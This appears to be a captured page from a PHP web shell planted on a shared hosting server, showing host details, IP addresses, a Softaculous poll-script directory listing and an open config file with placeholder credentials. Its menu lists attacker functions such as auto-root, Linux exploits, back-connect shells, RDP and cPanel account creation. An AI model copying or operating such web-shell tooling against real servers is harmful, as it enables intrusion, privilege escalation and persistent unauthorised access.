Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.14.145.167
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
cjdpoll /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
edit.php
3.41
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
232
B
-rw-r--r--
import.php
2.49
KB
-rw-r--r--
info.xml
1.58
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
3.81
KB
-rw-r--r--
install.xml
492
B
-rw-r--r--
md5
10.95
KB
-rw-r--r--
poll_config.php
1.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : poll_config.php
<?php $admin_name = "[[admin_realname]]"; // For the admin control Panel : ) $user = "[[admin_username]]"; // your admin username $pass = "[[admin_pass]]"; // your admin password $your_url = "[[softurl]]"; // your URL to poll files no trailing slash $imgurl = "[[softurl]]/bar.gif"; // url to bar.gif $poll_bar_height = "5"; // the height of your poll bar in pixels, 5 is default $stylesheet_url = ""; // leave blank ( = ""; ) for default $nopoll = "No Poll Open"; // text displayed when no poll open $voted_already = "Already Voted"; // text displayed when visitor has already voted on poll $view_archive = "View Archive"; // text displayed to view archive $vote_button_text = "Vote!"; $random_display = false; // change this to false if you do not want your polls to be displayed in random order $thankyou_message = true; // change to false if you want the poll to refresh the page after voting, otherwise a thank you message will be displayed $version = "2.0"; // version number ?>
Close